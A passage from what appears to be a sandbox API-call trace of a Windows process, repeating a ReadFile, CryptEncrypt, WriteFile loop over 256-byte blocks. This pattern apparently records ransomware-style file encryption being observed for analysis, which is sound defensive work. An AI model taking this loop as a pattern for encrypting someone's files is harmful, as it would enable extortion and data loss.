lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.443] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.443] GetLastError () returned 0x0 [0167.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.443] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.443] GetLastError () returned 0x0 [0167.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.444] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.444] GetLastError () returned 0x0 [0167.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.444] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.444] GetLastError () returned 0x0 [0167.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.444] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.444] GetLastError () returned 0x0 [0167.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.444] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.444] GetLastError () returned 0x0 [0167.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.444] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.444] GetLastError () returned 0x0 [0167.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.444] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.444] GetLastError () returned 0x0 [0167.444] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.444] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.445] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.445] GetLastError () returned 0x0 [0167.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.445] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.445] GetLastError () returned 0x0 [0167.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.445] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.445] GetLastError () returned 0x0 [0167.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.445] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.445] GetLastError () returned 0x0 [0167.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.445] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.445] GetLastError () returned 0x0 [0167.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.445] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.445] GetLastError () returned 0x0 [0167.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.445] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.445] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.445] GetLastError () returned 0x0 [0167.445] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.446] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.446] GetLastError () returned 0x0 [0167.446] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.446] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.446] GetLastError () returned 0x0 [0167.446] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.446] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.446] GetLastError () returned 0x0 [0167.446] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.446] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.446] GetLastError () returned 0x0 [0167.446] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.446] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.446] GetLastError () returned 0x0 [0167.446] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.446] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.446] GetLastError () returned 0x0 [0167.446] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.446] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.447] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.447] GetLastError () returned 0x0 [0167.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.447] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.447] GetLastError () returned 0x0 [0167.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.447] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.447] GetLastError () returned 0x0 [0167.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.447] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.447] GetLastError () returned 0x0 [0167.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.447] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.447] GetLastError () returned 0x0 [0167.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.447] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.447] GetLastError () returned 0x0 [0167.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.447] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.447] GetLastError () returned 0x0 [0167.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.448] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.448] GetLastError () returned 0x0 [0167.448] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.448] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.448] GetLastError () returned 0x0 [0167.448] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.448] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.448] GetLastError () returned 0x0 [0167.448] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.448] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.448] GetLastError () returned 0x0 [0167.448] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, 